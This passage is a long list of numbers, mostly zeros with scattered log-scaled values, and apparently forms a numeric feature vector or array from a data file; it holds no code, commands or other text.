0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 4.518263445217986, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, \n 3.1354942159291497, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 6.976014914136014, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0, 0.0, 4.584967478670572, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.2188758248682006, 11.292366238736987, \n 5.723585101952381, 0.0, 5.346437018291705, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.0986122886681098, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 4.189654742026425, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 1.9459101490553132, 0.0, 1.9459101490553132, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 3.0910424533583156, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 10.310508262345584, 7.602458061243374, \n 1.6094379124341003, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, \n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, \n 3.4965075614664802, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 2.9444389791664403, 0.0, 0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 1.3862943611198906, 0, 0, 3.4825185607408002, 0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 4.59511985013459, 0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 5.375278407684164, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 4.795790545596741, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.58351893845611, 0, 0, 4.394449154672439, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.1588830833596715, 1.791759469228055, 2.1972245773362196, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.290459441148391, 0.0, 0, 0, 0, \n 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.772588722239781,\n 0.0, 0.0, 6.955874930725805, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 